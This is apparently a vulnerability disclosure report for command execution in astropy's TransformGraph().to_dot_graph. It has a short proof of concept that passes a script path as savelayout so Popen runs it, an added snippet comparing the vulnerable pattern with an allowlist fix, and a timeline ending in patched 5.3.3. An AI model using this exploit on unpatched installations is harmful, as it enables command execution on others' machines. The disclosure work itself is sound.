RCE via TransformGraph().to_dot_graph function in astropy/astropy

Valid

Reported on

Aug 20th 2023


Description

Due to improper input validation, a malicious user can provide a command or a script file as the value of the savelayout argument. That value is placed as the first element of the argument list passed to subprocess.Popen, so it is executed as the program. Although an error is raised afterwards (communicate() is given a str instead of bytes), the process has already been started, and the command or script runs successfully.
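The following is an added illustration, not code from the report or from astropy: a minimal version of the vulnerable pattern (a caller-controlled string used as argv[0]) next to a hardened variant that only accepts a bare layout-engine name from an allowlist. The allowlist contents, the function names and the use of shutil.which are assumptions made for this example; they are not taken from the upstream fix (commit 53188c3 in the timeline below), which is not reproduced here.

```python
import shutil
import subprocess
from subprocess import PIPE

# Constructed allowlist of Graphviz layout engines a caller may name.
# Assumption for this example; not copied from astropy.
ALLOWED_LAYOUTS = frozenset({"dot", "neato", "twopi", "circo", "fdp", "sfdp"})


def output_format(savefn):
    """Derive the Graphviz -T format from the file extension ('png', 'txt', ...)."""
    return savefn.rsplit(".", 1)[-1]


def build_layout_command_vulnerable(savelayout, savefn):
    """Vulnerable pattern: whatever the caller passes becomes argv[0].

    A path such as "/tmp/script" is executed by Popen as the program; the
    str/bytes TypeError seen in the report happens only after it has started.
    """
    return [savelayout, f"-T{output_format(savefn)}"]


def is_allowed_layout(savelayout):
    """True only for a bare engine name on the allowlist (no paths, no flags)."""
    return isinstance(savelayout, str) and savelayout in ALLOWED_LAYOUTS


def validate_layout(savelayout):
    """Reject anything that is not an allowlisted engine name before it reaches Popen."""
    if not is_allowed_layout(savelayout):
        raise ValueError(
            f"savelayout must be one of {sorted(ALLOWED_LAYOUTS)}, got {savelayout!r}"
        )
    return savelayout


def build_layout_command(savelayout, savefn):
    """Hardened: argv[0] is a validated engine name, so only that program can run."""
    layout = validate_layout(savelayout)
    return [layout, f"-T{output_format(savefn)}"]


def render_dot(dotgraph, savelayout, savefn):
    """Run the validated layout engine, feeding the DOT text on stdin as bytes.

    Requires Graphviz to be installed; returns the number of output bytes written.
    """
    argv = build_layout_command(savelayout, savefn)
    if shutil.which(argv[0]) is None:
        raise FileNotFoundError(f"{argv[0]} is not installed or not on PATH")
    with subprocess.Popen(argv, stdin=PIPE, stdout=PIPE, stderr=PIPE) as proc:
        # communicate() needs bytes; passing a str is what raised the
        # TypeError in the report, after the process was already running.
        stdout, stderr = proc.communicate(dotgraph.encode("utf-8"))
    if proc.returncode != 0:
        raise RuntimeError(stderr.decode("utf-8", errors="replace"))
    with open(savefn, "wb") as fh:
        fh.write(stdout)
    return len(stdout)


if __name__ == "__main__":
    # Constructed inputs mirroring the report's call shape.
    print(build_layout_command_vulnerable("/tmp/script", "/tmp/1.txt"))  # argv[0] is the script
    print(build_layout_command("dot", "/tmp/graph.png"))                 # ['dot', '-Tpng']
    try:
        build_layout_command("/tmp/script", "/tmp/1.txt")
    except ValueError as exc:
        print("rejected:", exc)
```

The check is deliberately an allowlist of names rather than a blocklist of characters: a path, a relative name with a slash, or a name with embedded arguments all fail the membership test, and the engine is resolved on PATH only after validation.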

Proof of Concept

$ cat /tmp/script
#!/bin/bash
echo astrorce > /tmp/poc.txt
$ python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44) 
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from astropy.coordinates.transformations import TransformGraph
>>> tg = TransformGraph()
>>> tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph
    stdout, stderr = proc.communicate(dotgraph)
  File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate
    stdout, stderr = self._communicate(input, endtime, timeout)
  File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate
    input_view = memoryview(self._input)
TypeError: memoryview: a bytes-like object is required, not 'str'
>>> 
$ cat /tmp/poc.txt
astrorce

Impact

A malicious user will be able to execute commands on the user's machine.

We are processing your report and will contact the astropy team within 24 hours. 6 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 6 months ago
astropy/astropy maintainer
6 months ago

A maintainer was notified. Waiting for a patch to be released.

astropy/astropy maintainer
5 months ago

Fixed with 53188c3. Patched versions 5.0.8 and 5.3.3 were released.

astropy/astropy maintainer
5 months ago

@admin can you confirm the fix?

astropy/astropy maintainer
5 months ago

@admin I've asked the maintainer to confirm the fix using the link provided by this platform, but according to him he did not receive an email.

astropy/astropy maintainer
5 months ago

@admins

astropy/astropy maintainer modified the report
5 months ago
Ben Harvie (Admin)
5 months ago

Hi u32i,

If you provide a link to this report to the maintainer, they will be able to see this report as long as they have write permissions to the astropy/astropy GitHub repository.

Thanks

We have contacted a member of the astropy team and are waiting to hear back 4 months ago
astropy/astropy maintainer gave praise 4 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
astropy/astropy maintainer validated this vulnerability 4 months ago
u32i has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
astropy/astropy maintainer marked this as fixed in 5.3.3 with commit 53188c 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago